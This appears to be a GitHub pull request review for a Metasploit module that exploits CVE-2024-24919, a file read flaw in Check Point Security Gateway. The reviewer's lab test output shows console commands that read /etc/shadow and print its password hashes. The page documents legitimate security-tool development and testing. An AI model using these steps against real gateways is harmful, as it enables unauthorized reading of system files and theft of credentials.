-
Notifications
You must be signed in to change notification settings - Fork 13.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Auxiliary module for CVE-2024-24919 - Check Point Security Gateway arbitrary file read #19221
Conversation
Since Check Point has swapped out the download link on this page for a patched version, the link has been removed entirely.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thanks for the great module @remmons-r7! Also for the steps to setup the test environment 👍 A couple minor comments but other than those it looks good to go.
Testing
STORE_LOOT = true
msf6 > db_connect msf_user:notpassword@127.0.0.1:5432/msf_database
[*] Connected to Postgres data service: 127.0.0.1/msf_database
msf6 > use gather/checkpoint_gateway_fileread_cve_2024_24919
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set rhosts 172.16.199.52
rhosts => 172.16.199.52
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set STORE_LOOT true
STORE_LOOT => true
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > run
[*] Running module against 172.16.199.52
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Arbitrary file read successful!
[+] Stored the file data to loot...
[*] Auxiliary module execution completed
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
172.16.199.52 shadow /etc/shadow text/plain File read from Check Point Security Gateway server /home/msfuser/.msf4/loot/20240612161112_default_172.16.199.52_shadow_636575.txt
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > cat /home/msfuser/.msf4/loot/20240612161112_default_172.16.199.52_shadow_636575.txt
[*] exec: cat /home/msfuser/.msf4/loot/20240612161112_default_172.16.199.52_shadow_636575.txt
admin:$6$1HTJt2ZTyvTkurfN$Dp.MQ2UXWJXTRBQQdiq1fDY3df0QB2KMzqq5Xpx6NN.WtgnRSZiMtMKVFyhlr5RtGmmNX.E0HueE5xaD7vzzN/:14559:0:99999:8:::
monitor:*:19886:0:99999:8:::
root:*:19886:0:99999:7:::
cp_routeevt:*:19886:0:99999:7:::
nobody:*:19886:0:99999:7:::
postfix:*:19886:0:99999:7:::
rpm:!!:19886:0:99999:7:::
shutdown:*:19886:0:99999:7:::
pcap:!!:19886:0:99999:7:::
halt:*:19886:0:99999:7:::
cp_postgres:*:19886:0:99999:7:::
cp_extensions:*:19886:0:99999:7:::
cpep_user:*:19886:0:99999:7:::
vcsa:!!:19886:0:99999:7:::
_nonlocl:*:19886:0:99999:7:::
sshd:*:19886:0:99999:7:::
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) >
STORE_LOOT = false
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set rhosts 172.16.199.52
rhosts => 172.16.199.52
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
msf6 auxiliary(gather/checkpoint_gateway_fileread_cve_2024_24919) > run
[*] Running module against 172.16.199.52
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Arbitrary file read successful!
[+] File read succeeded!
admin:$6$1HTJt2ZTyvTkurfN$Dp.MQ2UXWJXTRBQQdiq1fDY3df0QB2KMzqq5Xpx6NN.WtgnRSZiMtMKVFyhlr5RtGmmNX.E0HueE5xaD7vzzN/:14559:0:99999:8:::
monitor:*:19886:0:99999:8:::
root:*:19886:0:99999:7:::
cp_routeevt:*:19886:0:99999:7:::
nobody:*:19886:0:99999:7:::
postfix:*:19886:0:99999:7:::
rpm:!!:19886:0:99999:7:::
shutdown:*:19886:0:99999:7:::
pcap:!!:19886:0:99999:7:::
halt:*:19886:0:99999:7:::
cp_postgres:*:19886:0:99999:7:::
cp_extensions:*:19886:0:99999:7:::
cpep_user:*:19886:0:99999:7:::
vcsa:!!:19886:0:99999:7:::
_nonlocl:*:19886:0:99999:7:::
sshd:*:19886:0:99999:7:::
[*] Auxiliary module execution completed
modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.rb
Outdated
Show resolved
Hide resolved
documentation/modules/auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919.md
Outdated
Show resolved
Hide resolved
From peer review suggestion. Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
From peer review suggestion. Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
From peer review suggestion. Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
Secondary commit from peer review suggestion.
Release NotesThis module leverages an unauthenticated arbitrary root file read vulnerability for Check Point Security Gateway appliances. When the IPSec VPN or Mobile Access blades are enabled on affected devices, traversal payloads can be used to read any files on the local file system. This vulnerability is tracked as CVE-2024-24919. |
This module leverages an unauthenticated arbitrary root file read vulnerability for Check Point Security Gateway appliances. When the IPSec VPN or Mobile Access blades are enabled on affected devices, traversal payloads can be used to read any files on the local file system. Password hashes read from disk may be cracked, potentially resulting in administrator-level access to the target device. This vulnerability is tracked as CVE-2024-24919.
Verification
use auxiliary/gather/checkpoint_gateway_fileread_cve_2024_24919
set RHOSTS <TARGET_IP_ADDRESS>
set RPORT <TARGET_PORT>
set TARGETFILE <TARGET_FILE_TO_READ>
set STORE_LOOT false
if you want to display file on the console instead of storing it as loot.run
Example usage
I'll privately share a capture of the module running with a member of the Metasploit team. Thank you!